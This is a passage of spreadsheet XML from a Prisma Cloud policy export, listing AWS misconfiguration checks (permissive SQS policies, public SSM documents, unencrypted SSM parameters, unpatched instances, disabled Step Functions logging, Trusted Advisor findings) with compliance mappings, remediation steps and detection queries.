          <t>This policy identifies Simple Queue Service (SQS) queues that have an overly permissive access policy. It is highly recommended to have the least privileged access policy to protect the SQS queue from data leakage and unauthorized access.
For more details:
https://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/sqs-basic-examples-of-sqs-policies.html</t>
        </is>
      </c>
      <c r="X2131" t="inlineStr">
        <is>
          <t>1. Log in to the AWS console
2. Select the region, from the region drop-down, in which the alert is generated
3. Navigate to Simple Queue Service (SQS) dashboard
4. Choose the reported Simple Queue Service (SQS) and choose 'Edit'
5. Scroll to the 'Access policy' section
6. Edit the access policy statements in the input box, Make sure the 'Principal' is not set to '*', which makes your SQS queues accessible to any anonymous users.
7. When you finish configuring the access policy, choose 'Save'. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-iam-46
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-iam-46</t>
        </is>
      </c>
      <c r="Y2131" t="inlineStr"/>
      <c r="Z2131" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-sqs-get-queue-attributes' AND json.rule = attributes.Policy.Statement[?any(Effect equals Allow and (Action anyStartWith sqs: or Action anyStartWith SQS:) and (Principal.AWS contains * or Principal equals *) and Condition does not exist)] exists
{"category":"IAM","resourceTypes":["aws_sqs_queue_policy"]}</t>
        </is>
      </c>
      <c r="AA2131" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2131" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2131" t="inlineStr">
        <is>
          <t>PC-AWS-SQS-634-CKV_AWS_72</t>
        </is>
      </c>
      <c r="AD2131" t="b">
        <v>1</v>
      </c>
      <c r="AE2131" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2131" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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1" t="inlineStr">
        <is>
          <t>bfe88196-dc6b-4c34-bda7-ef4b90942544</t>
        </is>
      </c>
      <c r="AI2131" t="inlineStr">
        <is>
          <t>909d9fdc-8a80-4757-afbe-d1829939c40c</t>
        </is>
      </c>
      <c r="AJ2131" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2131" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2132">
      <c r="A2132" t="inlineStr">
        <is>
          <t>HITRUST CSF v.11.2.0, TX-RAMP Level 2, NIST 800-53 Rev 5, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B2132" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2132" s="2" t="inlineStr"/>
      <c r="D2132" t="inlineStr"/>
      <c r="E2132" t="inlineStr"/>
      <c r="F2132" t="inlineStr"/>
      <c r="G2132" t="b">
        <v>1</v>
      </c>
      <c r="H21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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2132" t="inlineStr">
        <is>
          <t>aws-ssm</t>
        </is>
      </c>
      <c r="K2132" t="inlineStr">
        <is>
          <t>AWS SSM documents are public</t>
        </is>
      </c>
      <c r="L2132" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2132" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2132" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2132" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2132" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2132" t="inlineStr">
        <is>
          <t>Principle 6</t>
        </is>
      </c>
      <c r="R2132" t="inlineStr">
        <is>
          <t>6.2.3</t>
        </is>
      </c>
      <c r="S2132" t="inlineStr"/>
      <c r="T2132" t="b">
        <v>0</v>
      </c>
      <c r="U2132" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2132" t="inlineStr">
        <is>
          <t>aws-ssm-document</t>
        </is>
      </c>
      <c r="W2132" t="inlineStr">
        <is>
          <t>This policy identifies list of SSM documents that are public and might allow unintended access. A public SSM document can expose valuable information about your account, resources, and internal processes. It is recommended to only share SSM documents to only few private AWS accounts based on the requirement.</t>
        </is>
      </c>
      <c r="X2132" t="inlineStr">
        <is>
          <t>To make an SSM document private follow the steps mentioned in below URL:
1.Go to the AWS console Systems Manager Dashboard.
2.If the AWS Systems Manager home page opens first, choose the menu icon to open the navigation pane, and then choose Documents in the navigation pane.
3.In the documents list, choose the document you want to stop sharing, and then choose details. On the Permissions tab, verify that you're the document owner. Only a document owner can stop sharing a document.
4.Choose Edit.
5.Select Private option, and enter AWS accountId only with which this document can be shared(leave it blank if not willing to share now). 
6.Choose Save 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-303
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-303</t>
        </is>
      </c>
      <c r="Y2132" t="inlineStr"/>
      <c r="Z2132" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ssm-document' AND json.rule = accountSharingInfoList[*].accountId equal ignore case "all"
{"category":"General","resourceTypes":["aws_ssm_document"]}</t>
        </is>
      </c>
      <c r="AA2132" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2132" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2132" t="inlineStr">
        <is>
          <t>PC-AWS-SSM-959-CKV_AWS_303</t>
        </is>
      </c>
      <c r="AD2132" t="b">
        <v>1</v>
      </c>
      <c r="AE2132" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2132" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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2" t="inlineStr">
        <is>
          <t>b7673d43-cf84-4cb9-9e00-60d99365f35f</t>
        </is>
      </c>
      <c r="AI2132" t="inlineStr">
        <is>
          <t>998d0466-d498-4662-b41a-cefaadd94c40</t>
        </is>
      </c>
      <c r="AJ2132" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2132" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2133">
      <c r="A2133" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v.4.0.1, CSA CCM v4.0.12, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, APRA (CPS 234) Information Security, FFIEC, CHC HITRUST CSF v.9.6.0, NIST SP 800-172, kfirdaus AWS Account-CS, CIS Controls v8, Risk Management in Technology (RMiT), CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), FFIEC, CSA CCM v4.0.12, HITRUST CSF v.11.2.0, Fedramp (Moderate), RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Telecommunications Security Act - TSA, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, CDC NIST 800-53 Rev4, Copy of CIS Controls v8, PCI DSS v4.0, NIST 800-53 Rev 5, FFIEC, NIST 800-53 Rev4, HITRUST v.9.4.2 [Deprecated], CyberSecurity Law of the People's Republic of China, MLPS 2.0 (Level 2), SOC 2, ISO/IEC 27017:2015, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, Telecommunications Security Act - TSA, Microsoft Cloud Security Benchmark v1, ACSC Information Security Manual (ISM), DORA, ISO/IEC 27002:2013, PCI DSS v4.0, Telecommunications Security Act - TSA, Risk Management in Technology (RMiT), ISO/IEC 27018:2019, MAS TRM 2021, kfirdaus AWS Account-CS, CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, DORA, MLPS 2.0 (Level 3), PCI DSS v4.0, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CSA CCM v.4.0.1, NIST 800-53 Rev 5, Sarbanes Oxley Act (SOX), PCI DSS v4.0, APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), NIST CSF, SOC 2, NIST CSF, PCI DSS v4.0, Copy of ACSC Information Security Manual (ISM)-clone, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, PCI DSS v4.0, MLPS 2.0, ISO/IEC 27002:2013, CSA CCM v4.0.12, NYDFS 23 CRR-NY 500.0, APRA (CPS 234) Information Security, CCPA 2018, MAS TRM 2021, PIPEDA, ISO/IEC 27002:2013, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2024.2, CyberSecurity Law of the People's Republic of China, NIST SP 800-172, PCI DSS v4.0, NIST SP 800-171 Revision 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v3.2.1, NIST 800-53 Rev4, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2133" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2133" s="2" t="inlineStr"/>
      <c r="D2133" t="inlineStr"/>
      <c r="E2133" t="inlineStr"/>
      <c r="F2133" t="inlineStr"/>
      <c r="G2133" t="b">
        <v>1</v>
      </c>
      <c r="H21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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2133" t="inlineStr">
        <is>
          <t>aws-ssm</t>
        </is>
      </c>
      <c r="K2133" t="inlineStr">
        <is>
          <t>AWS SSM Parameter is not encrypted</t>
        </is>
      </c>
      <c r="L2133" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2133" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2133" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2133" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2133" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2133" t="inlineStr">
        <is>
          <t>AC-1</t>
        </is>
      </c>
      <c r="R2133" t="inlineStr">
        <is>
          <t>AC-17 (2)</t>
        </is>
      </c>
      <c r="S2133" t="inlineStr">
        <is>
          <t>Policy Status Review</t>
        </is>
      </c>
      <c r="T2133" t="b">
        <v>0</v>
      </c>
      <c r="U2133" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2133" t="inlineStr">
        <is>
          <t>aws-ssm-parameter</t>
        </is>
      </c>
      <c r="W2133" t="inlineStr">
        <is>
          <t>This policy identifies the AWS SSM Parameters which are not encrypted. AWS Systems Manager (SSM) parameters that store sensitive data, for example, passwords, database strings, and permit codes are encrypted so as to meet security and compliance prerequisites. An encrypted SSM parameter is any sensitive information that should be kept and referenced in a protected way.</t>
        </is>
      </c>
      <c r="X2133" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS Console
2. Go to System Manager
3. In the navigation panel, Click on 'Parameter Store'
4. Choose the reported parameter and port it to a new parameter with Type 'SecureString'
5. Delete the reported parameter by clicking on 'Delete'
6. Click on 'Delete parameters' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-ssm-parameter-is-encrypted
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-ssm-parameter-is-encrypted</t>
        </is>
      </c>
      <c r="Y2133" t="inlineStr"/>
      <c r="Z2133" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ssm-parameter' AND json.rule = 'type does not contain SecureString'
{"category":"General","resourceTypes":["aws_ssm_parameter"]}</t>
        </is>
      </c>
      <c r="AA2133" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2133" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2133" t="inlineStr">
        <is>
          <t>PC-AWS-SSM-370-CKV2_AWS_34</t>
        </is>
      </c>
      <c r="AD2133" t="b">
        <v>1</v>
      </c>
      <c r="AE2133" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2133" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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3" t="inlineStr">
        <is>
          <t>926b7056-6a39-4885-a806-8e4cf958fced</t>
        </is>
      </c>
      <c r="AI2133" t="inlineStr">
        <is>
          <t>22fc52a7-6446-4cf4-b5ac-c1631c52922d</t>
        </is>
      </c>
      <c r="AJ2133" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2133" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2134">
      <c r="A2134" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2134" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2134" s="2" t="inlineStr"/>
      <c r="D2134" t="inlineStr"/>
      <c r="E2134" t="inlineStr"/>
      <c r="F2134" t="inlineStr"/>
      <c r="G2134" t="b">
        <v>1</v>
      </c>
      <c r="H21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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2134" t="inlineStr">
        <is>
          <t>aws-ssm</t>
        </is>
      </c>
      <c r="K2134" t="inlineStr">
        <is>
          <t>AWS Systems Manager EC2 instance having NON_COMPLIANT patch compliance status</t>
        </is>
      </c>
      <c r="L2134" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2134" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2134" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2134" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2134" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2134" t="inlineStr">
        <is>
          <t>AM</t>
        </is>
      </c>
      <c r="R2134" t="inlineStr">
        <is>
          <t>AM-3</t>
        </is>
      </c>
      <c r="S2134" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2134" t="b">
        <v>0</v>
      </c>
      <c r="U2134" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2134" t="inlineStr">
        <is>
          <t>aws-ssm-resource-compliance-summary</t>
        </is>
      </c>
      <c r="W2134" t="inlineStr">
        <is>
          <t>This policy identifies if the AWS Systems Manager patch compliance status is "NON_COMPLIANT" with critical or high severity for managed instances. Instances labeled non-compliant might lack essential patches for security, stability, or meeting standards. Non-compliant instances pose security risks because attackers often target unpatched systems to exploit known weaknesses. As a security best practice, it's recommended to apply any missing patches to the affected instances.</t>
        </is>
      </c>
      <c r="X2134" t="inlineStr">
        <is>
          <t>To remediate the non-compliant managed instances please refer to the below URL:
https://docs.aws.amazon.com/systems-manager/latest/userguide/patch-manager-compliance-remediation.html</t>
        </is>
      </c>
      <c r="Y2134" t="inlineStr"/>
      <c r="Z2134" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ssm-resource-compliance-summary' AND json.rule = Status equals "NON_COMPLIANT" and ComplianceType contains "Patch" and ResourceType contains "ManagedInstance" and (NonCompliantSummary.SeveritySummary.CriticalCount greater than 0 or NonCompliantSummary.SeveritySummary.HighCount greater than 0)</t>
        </is>
      </c>
      <c r="AA2134" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2134" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2134" t="inlineStr">
        <is>
          <t>PC-AWS-SSM-1102</t>
        </is>
      </c>
      <c r="AD2134" t="b">
        <v>1</v>
      </c>
      <c r="AE2134" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2134" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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4" t="inlineStr">
        <is>
          <t>f2c87a87-bf6d-4c09-8b33-bd0b16f7ad29</t>
        </is>
      </c>
      <c r="AI2134" t="inlineStr">
        <is>
          <t>067ae0bd-2316-4204-981c-968f9ad25303</t>
        </is>
      </c>
      <c r="AJ2134" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2134" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2135">
      <c r="A2135" t="inlineStr">
        <is>
          <t>ITSG-33, NYDFS 23 CRR-NY 500.0, GDPR, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, SOC 2, Secure Controls Framework (SCF) - 2024.2, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, DORA</t>
        </is>
      </c>
      <c r="B2135" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2135" s="2" t="inlineStr"/>
      <c r="D2135" t="inlineStr"/>
      <c r="E2135" t="inlineStr"/>
      <c r="F2135" t="inlineStr"/>
      <c r="G2135" t="b">
        <v>1</v>
      </c>
      <c r="H21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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2135" t="inlineStr">
        <is>
          <t>aws-step</t>
        </is>
      </c>
      <c r="K2135" t="inlineStr">
        <is>
          <t>AWS Step Function state machines logging disabled</t>
        </is>
      </c>
      <c r="L2135" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2135" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2135" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2135" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2135" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2135" t="inlineStr">
        <is>
          <t>Chapter II</t>
        </is>
      </c>
      <c r="R2135" t="inlineStr">
        <is>
          <t>Article 10, Detection</t>
        </is>
      </c>
      <c r="S2135" t="inlineStr"/>
      <c r="T2135" t="b">
        <v>0</v>
      </c>
      <c r="U2135" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2135" t="inlineStr">
        <is>
          <t>aws-step-functions-statemachine</t>
        </is>
      </c>
      <c r="W2135" t="inlineStr">
        <is>
          <t>This policy identifies AWS Step Function state machines with logging disabled.
AWS Step Functions uses state machines to define and execute workflows that coordinate the components of distributed applications and microservices. Step Functions logs state machine executions to Amazon CloudWatch Logs for debugging and monitoring purposes.
It is recommended to enable logging on the Step Function state machine to maintain reliability, availability, and performance.</t>
        </is>
      </c>
      <c r="X2135" t="inlineStr">
        <is>
          <t>To enable logging on the Step Function state machine, follow the below steps:
1. Log into the AWS console and navigate to the Step Function dashboard
2. On the state machine page, select the reported state machine
3. Click on 'Edit'
4. Select 'Config' to edit the configuration
5. Under the 'Config' tab, under the 'Logging' section, set 'Log level' to 'ALL'
6. Click on 'Save'.</t>
        </is>
      </c>
      <c r="Y2135" t="inlineStr"/>
      <c r="Z2135" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-step-functions-statemachine' AND json.rule = loggingConfiguration.level does not equal ignore case "ALL"</t>
        </is>
      </c>
      <c r="AA2135" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2135" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2135" t="inlineStr">
        <is>
          <t>PC-AWS-SFN-1175</t>
        </is>
      </c>
      <c r="AD2135" t="b">
        <v>1</v>
      </c>
      <c r="AE2135" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2135" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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5" t="inlineStr">
        <is>
          <t>e63d8ef3-5a47-4679-8b82-fcabf6c8fbe2</t>
        </is>
      </c>
      <c r="AI2135" t="inlineStr">
        <is>
          <t>da73e80c-489f-456a-be5f-9cc2312ba5d3</t>
        </is>
      </c>
      <c r="AJ2135" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2135" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2136">
      <c r="A2136" t="inlineStr"/>
      <c r="B2136" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2136" s="2" t="inlineStr"/>
      <c r="D2136" t="inlineStr"/>
      <c r="E2136" t="inlineStr"/>
      <c r="F2136" t="inlineStr"/>
      <c r="G2136" t="b">
        <v>1</v>
      </c>
      <c r="H21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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2136" t="inlineStr">
        <is>
          <t>aws-trusted</t>
        </is>
      </c>
      <c r="K2136" t="inlineStr">
        <is>
          <t>AWS Trusted Advisor No Listener Uses a Secure Protocol</t>
        </is>
      </c>
      <c r="L2136" t="inlineStr"/>
      <c r="M2136" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2136" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2136" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2136" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2136" t="inlineStr"/>
      <c r="R2136" t="inlineStr"/>
      <c r="S2136" t="inlineStr"/>
      <c r="T2136" t="b">
        <v>0</v>
      </c>
      <c r="U2136" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2136" t="inlineStr">
        <is>
          <t>aws-trusted-advisor-check-result</t>
        </is>
      </c>
      <c r="W2136" t="inlineStr"/>
      <c r="X2136" t="inlineStr"/>
      <c r="Y2136" t="inlineStr"/>
      <c r="Z2136" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-trusted-advisor-check-result' AND json.rule = result.flaggedResources[*].metadata contains "No listener uses a secure protocol"</t>
        </is>
      </c>
      <c r="AA2136" t="inlineStr">
        <is>
          <t>Ivaylo Kirilov</t>
        </is>
      </c>
      <c r="AB2136" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2136" t="inlineStr"/>
      <c r="AD2136" t="b">
        <v>0</v>
      </c>
      <c r="AE2136" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2136" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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6" t="inlineStr">
        <is>
          <t>3c85b672-409c-45d9-bc66-04b271414136</t>
        </is>
      </c>
      <c r="AI2136" t="inlineStr">
        <is>
          <t>91531068-9022-40ef-8f95-82a7315ecfbd</t>
        </is>
      </c>
      <c r="AJ2136" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2136" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2137">
      <c r="A2137" t="inlineStr"/>
      <c r="B2137" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2137" s="2" t="inlineStr"/>
      <c r="D2137" t="n">
        <v>0</v>
      </c>
      <c r="E2137" t="n">
        <v>10</v>
      </c>
      <c r="F2137" t="n">
        <v>0</v>
      </c>
      <c r="G2137" t="b">
        <v>1</v>
      </c>
      <c r="H21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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2137" t="inlineStr">
        <is>
          <t>aws-trusted</t>
        </is>
      </c>
      <c r="K2137" t="inlineStr">
        <is>
          <t>AWS Trusted Advisor Security Group Allowing RDP</t>
        </is>
      </c>
      <c r="L2137" t="inlineStr"/>
      <c r="M2137" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2137" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2137" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2137" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2137" t="inlineStr"/>
      <c r="R2137" t="inlineStr"/>
      <c r="S2137" t="inlineStr"/>
      <c r="T2137" t="b">
        <v>0</v>
      </c>
      <c r="U2137" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2137" t="inlineStr">
        <is>
          <t>aws-trusted-advisor-check-result</t>
        </is>
      </c>
      <c r="W2137" t="inlineStr"/>
      <c r="X2137" t="inlineStr"/>
      <c r="Y2137" t="inlineStr"/>
      <c r="Z2137" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-trusted-advisor-check-result' AND json.rule = result.flaggedResources[*].metadata contains "3389"</t>
        </is>
      </c>
      <c r="AA2137" t="inlineStr">
        <is>
          <t>Ivaylo Kirilov</t>
        </is>
      </c>
      <c r="AB2137" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2137" t="inlineStr"/>
      <c r="AD2137" t="b">
        <v>0</v>
      </c>
      <c r="AE2137" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2137" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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7" t="inlineStr">
        <is>
          <t>7997b802-63c4-41c0-b771-efcc7429a5d5</t>
        </is>
      </c>
      <c r="AI2137" t="inlineStr">
        <is>
          <t>f629348f-997e-4399-ae71-acdc3654d8ce</t>
        </is>
      </c>
      <c r="AJ2137" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2137" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2138">
      <c r="A2138" t="inlineStr"/>
      <c r="B2138" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2138" s="2" t="inlineStr"/>
      <c r="D2138" t="n">
        <v>0</v>
      </c>
      <c r="E2138" t="n">
        <v>6276</v>
      </c>
      <c r="F2138" t="n">
        <v>0</v>
      </c>
      <c r="G2138" t="b">
        <v>1</v>
      </c>
      <c r="H21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38" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2138" t="inlineStr">
        <is>
          <t>aws-trusted</t>
        </is>
      </c>
      <c r="K2138" t="inlineStr">
        <is>
          <t>AWS Trusted Advisor Findings</t>
        </is>
      </c>
      <c r="L2138" t="inlineStr"/>
      <c r="M2138" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2138" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2138" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2138" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2138" t="inlineStr"/>
      <c r="R2138" t="inlineStr"/>
      <c r="S2138" t="inlineStr"/>
      <c r="T2138" t="b">
        <v>0</v>
      </c>
      <c r="U2138" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2138" t="inlineStr">
        <is>
          <t>aws-trusted-advisor-check-result</t>
        </is>
      </c>
      <c r="W2138" t="inlineStr"/>
      <c r="X2138" t="inlineStr"/>
      <c r="Y2138" t="inlineStr"/>
      <c r="Z2138" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-trusted-advisor-check-result' AND json.rule = result.status does not contain "ok"</t>
        </is>
      </c>
      <c r="AA2138" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB2138" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2138" t="inlineStr"/>
      <c r="AD2138" t="b">
        <v>0</v>
      </c>
      <c r="AE2138" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2138" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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38" t="inlineStr">
        <is>
          <t>8b439e61-8926-4193-bed4-769c4c912dc9</t>
        </is>
      </c>
      <c r="AI2138" t="inlineStr">
        <is>
          <t>c174b7f5-17af-4432-a622-c2f5e0ea586a</t>
        </is>
      </c>
      <c r="AJ2138" t="inlineStr">
        <is>
